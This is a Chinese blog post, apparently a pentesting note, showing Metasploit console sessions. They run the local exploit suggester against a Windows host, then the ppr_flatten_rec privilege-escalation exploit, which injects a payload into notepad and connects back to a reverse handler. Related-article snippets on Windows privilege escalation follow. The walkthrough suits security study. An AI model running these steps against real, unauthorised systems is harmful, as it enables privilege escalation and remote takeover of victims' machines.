metasploit - local_exploit_suggester

最新推荐文章于 2023-06-11 16:58:15 发布
最新推荐文章于 2023-06-11 16:58:15 发布
阅读量3.2k 收藏
点赞数
分类专栏: Metasploit Pentesting
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/47672713
版权 
msf post(local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          1                yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > run

[*] 192.168.1.102 - Collecting local exploits for x86/windows...
[*] 192.168.1.102 - The following 28 exploit checks are being tried:
[*] 192.168.1.102 - exploit/windows/local/adobe_sandbox_adobecollabsync
[*] 192.168.1.102 - exploit/windows/local/agnitum_outpost_acs
[*] 192.168.1.102 - exploit/windows/local/always_install_elevated
[*] 192.168.1.102 - exploit/windows/local/bthpan
[*] 192.168.1.102 - exploit/windows/local/bypassuac
[*] 192.168.1.102 - exploit/windows/local/bypassuac_injection
[*] 192.168.1.102 - exploit/windows/local/ikeext_service
[*] 192.168.1.102 - exploit/windows/local/ipass_launch_app
[*] 192.168.1.102 - exploit/windows/local/lenovo_systemupdate
[*] 192.168.1.102 - exploit/windows/local/mqac_write
[*] 192.168.1.102 - exploit/windows/local/ms10_015_kitrap0d
[*] 192.168.1.102 - exploit/windows/local/ms10_092_schelevator
[*] 192.168.1.102 - exploit/windows/local/ms11_080_afdjoinleaf
[*] 192.168.1.102 - exploit/windows/local/ms13_005_hwnd_broadcast
[*] 192.168.1.102 - exploit/windows/local/ms13_053_schlamperei
[*] 192.168.1.102 - exploit/windows/local/ms13_081_track_popup_menu
[*] 192.168.1.102 - exploit/windows/local/ms14_058_track_popup_menu
[*] 192.168.1.102 - exploit/windows/local/ms14_070_tcpip_ioctl
[*] 192.168.1.102 - exploit/windows/local/ms15_004_tswbproxy
[*] 192.168.1.102 - exploit/windows/local/ms15_051_client_copy_image
[*] 192.168.1.102 - exploit/windows/local/ms_ndproxy
[*] 192.168.1.102 - exploit/windows/local/novell_client_nicm
[*] 192.168.1.102 - exploit/windows/local/novell_client_nwfs
[*] 192.168.1.102 - exploit/windows/local/ntapphelpcachecontrol
[*] 192.168.1.102 - exploit/windows/local/powershell_remoting
[*] 192.168.1.102 - exploit/windows/local/ppr_flatten_rec
[*] 192.168.1.102 - exploit/windows/local/service_permissions
[*] 192.168.1.102 - exploit/windows/local/virtual_box_guest_additions
[*] 192.168.1.102 - exploit/windows/local/adobe_sandbox_adobecollabsync: Cannot reliably check exploitability.
[*] 192.168.1.102 - exploit/windows/local/agnitum_outpost_acs: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/always_install_elevated: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/bthpan: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/bypassuac: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/bypassuac_injection: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[*] 192.168.1.102 - exploit/windows/local/ipass_launch_app: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/lenovo_systemupdate: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/mqac_write: The target is not exploitable.
[+] 192.168.1.102 - exploit/windows/local/ms10_015_kitrap0d: The target appears to be vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] 192.168.1.102 - exploit/windows/local/ms11_080_afdjoinleaf: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/ms13_005_hwnd_broadcast: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ms13_053_schlamperei: The target is vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms13_081_track_popup_menu: The target is vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms14_058_track_popup_menu: The target service is running, but could not be validated.
[*] 192.168.1.102 - exploit/windows/local/ms14_070_tcpip_ioctl: The target is not exploitable.
[+] 192.168.1.102 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.1.102 - exploit/windows/local/ms15_051_client_copy_image: The target service is running, but could not be validated.
[*] 192.168.1.102 - exploit/windows/local/ms_ndproxy: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/novell_client_nicm: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/novell_client_nwfs: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/ntapphelpcachecontrol: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/powershell_remoting: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ppr_flatten_rec: The target is vulnerable.
[*] 192.168.1.102 - exploit/windows/local/service_permissions: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/virtual_box_guest_additions: The target is not exploitable.
[*] Post module execution completed
msf post(local_exploit_suggester) > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > show options 

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(ppr_flatten_rec) > run

[*] Started reverse handler on 192.168.1.108:4444 
[*] Launching notepad to host the exploit...
[+] Process 872 launched.
[*] Reflectively injecting the exploit DLL into 872...
[*] Injecting exploit into 872 ...
[*] Exploit injected. Injecting payload into 872...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 10 sec ...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.

References

https://community.rapid7.com/community/metasploit/blog/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more

Nixawk
关注
专栏目录
48-2 内网渗透 - 利用Metasploit提权
weixin_43263566的博客
06-19 123
Metasploit是一个开源的安全漏洞检测工具,广泛用于安全和IT专业人士识别、验证和利用安全漏洞,同时也支持专家驱动的安全评估和管理。
HTB Optimum[Hack The Box HTB靶场]writeup系列6
重新启程
02-04 3161
这是HTB retire machine的第六台靶机 目录 0x00 靶机情况 0x01 信息搜集 端口扫描 检索应用 0x02 get webshell 0x03 提权 mfs中查找提权程序 执行systeminfo 执行windows-exploit-suggester.py 执行ms16-098 0x00 靶机情况 可以看到这台靶机是windows的靶机,难...
系统内核溢出漏洞提权之Windows Exploit Suggester
weixin_46104215的博客
11-03 693
Windows Exploit Suggester工具:将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而其需要的只有目标系统的信息 下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester (如果下载失败,可以看之前的文章) 1.使用systeminfo 命令 ,并将补丁信息导入文件(patches.txt)(shell) systeminfo > patches.txt ..
msf利用- windows内核提权漏洞
weixin_30273763的博客
03-27 357
windows内核提权漏洞 环境: Kali Linux(攻击机) 192.168.190.141 Windows2003SP2(靶机) 192.168.190.147 0x01寻找可利用的exp 实战中我们在拿到一个反弹shell后(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester。这...
渗透测试提权指南
遇事不决冲冲冲
12-04 7524
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
内网渗透-----权限分析及防御
qq_43590351的博客
10-20 3115
内网权限提升及防御
windows grep命令_Metasploit框架MSFconsole命令详解
weixin_39860636的博客
11-25 1229
MSFconsole核心命令教程MSFconsole有许多不同的命令选项可供选择。以下是Metasploit命令的核心组合,并参考其格式。back 从当前上下文返回banner 显示一个很棒的metasploit横幅cd 更改当前的工作目录color 切换颜色connect 与主机通信edit 使用或 ED...
118.网络安全渗透测试—[权限提升篇16]—[Windows MSF提权模块&提权审计工具]
qwsn
07-08 4929
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)生成攻击载核:(2)msf开启监听: (3)利用文件上传的MIME白名单类型突破,上传了up.aspx大马,然后上传64.exe并执行,后得到一个低权限的shell: (4)当前session下执行漏洞检测模块: #这里没有扫描到漏洞,可以换个方法扫描 当然了也可以指定session进行漏洞检测: (5)挂起session,在Metasploit控制台下search搜索2008 #根据关键字搜索,晒选结果中loc
MSF学习笔记(11)
Shadow 爬爬记
02-12 936
本地提权漏洞检测 meterpreter > run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe msf ...
117.网络安全渗透测试—[权限提升篇15]—[Ubuntu15.04 Metasploit提权]
qwsn
07-08 3714
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。php马: elf马:#msfconsole,开启Metasploit控制台 如下图所示,我们首先上传shellx.php攻击载荷到靶机:
msfsuggester:使用OpenVAS XML输出的Metasploit漏洞利用建议程序
05-09
Msfsuggester Msfsuggester是一个解析OpenVAS XML输出并使用msfcli命令行从metasploit提出利用建议的工具。 安装 $ git clone https://github.com/m0nad/msfsuggester $ gem install nokogiri 用法 ruby msfsuggester.rb openvas.xml /path/to/metasploit-framework/ 例子: $ ruby msfsuggester.rb OPENVAS_metasploitable.xml /home/monad/metasploit-framework/ == (GoodRanking) MySQL yaSSL CertDecoder::GetName Buffer Overflow == msfcli exploit/linux/
Metasploit系列----未知目标测试
bronze_s的博客
05-08 439
攻击机器:kali 192.168.1.8 目标机器:windows2003 192.168.1.7 操作步骤 创建工作空间 显示数据库未连接 使用msfdb init对数据进行初始化 使用命令db_status查看数据库状态信息,显示数据库已连接。 使用命令workspace -a 192.168.1.7创建目标工作空间。 信息搜集 测试目标连通性:ping 192.168.1.7(ping -c 3 ip :ping三次后结束 和 ping 使用ctrl+c结束) 测试目标服务:在msf中使
Windows内核漏洞利用提权教程
systemino的博客
04-19 1480
PS. 本文仅限于技术讨论,严禁用于其他用途。 继上一篇“使用自动化脚本进行Windows提权”,本文将介绍有关Windows内核漏洞提权的方法。我将使用内置的Metasploit模块作为演示。通过本文的学习,你将了解系统的哪些部分可被利用,并匹配最佳可利用模块进一步的提升权限。 Windows-Exploit-suggester Metasploit内置模块提供了各种可用于提权的local...
2021-10-074号靶场转自y神的学习笔记(net渗透,sockcap,msf多重网段渗透,os-shell,验证码重放,C#解密,wfuzz穷举subdomain)
qq_45290991的博客
10-07 2565
masscan扫描 kali@kali:~$ sudo masscan -p 1-65535 192.168.0.134 --rate=1000 [sudo] kali 的密码: Starting masscan 1.0.5 (http://bit.ly/14GZzc...
内网域渗透分析(实战总结)
kali_Ma的博客
10-08 6912
一、测试环境搭建 靶场常见的网络拓扑环境如下: web服务器安装有双网卡,一块网卡连接互联网,一块网卡连接内网,内网里的机器是无法直接连接互联网的。我们使用vmware来模拟上述环境,配置网卡如下: 我们甚至还可以将web服务器的上网网卡NAT改为自定义VMnet3,将攻击机的网卡也改为VMnet3,这样的好处是整个渗透测试过程既保证了网络都是通的,又保证了ip不会发生变化,利于我们持续的作渗透,ip自定义为我们便于记忆数字,提高我们的效率。(有时候6个以上虚拟机同时开着,时不时忘了ip又得来回切换真的
MSF自动查找可用提权的EXP
nathan8的博客
09-25 5462
在渗透测试过程中,已经拿到反弹的普通权限shell,如果要再进一步提权,MSF可以提供丰富的提权EXP,但是具体用哪一个,我们不太好选择,漫无目的的去试极大得浪费时间。 为此,MSF专门提供了一个查找适用EXP的内置模块“Local Exploit Suggester”,如其名字一样,提供EXP建议,我们可以在MSF界面搜索suggester,找到他,并利用。 图1 接下来设置其参数。 输入options查看需要设置的选项; 然后set session 6(这里ses...
网络空间安全B模块加固(Windows篇)
最新发布
m0_74485250的博客
06-11 373
网络空间安全加固模块
cc123 靶场测试笔记
qq_56426046的博客
01-22 3756
本靶场存在四个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。我希望兜兜转转之后那个人还是你。
CISP-PTE-Windows2003教程
飞花舞者的博客
02-03 1537
防火墙关不掉,师傅们看要怎么搞???
Metasploit Framework 3.0:Exploit开发与集成指南
本手册详细介绍了如何在 Metasploit 中开发和集成 Exploit,对于理解利用攻击原理和技术具有很高的价值。 **前言** 随着 Metasploit 从 2.x 版本升级到 3.0 版本,开发语言从 Perl 转变为 Ruby,使得框架的功能和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值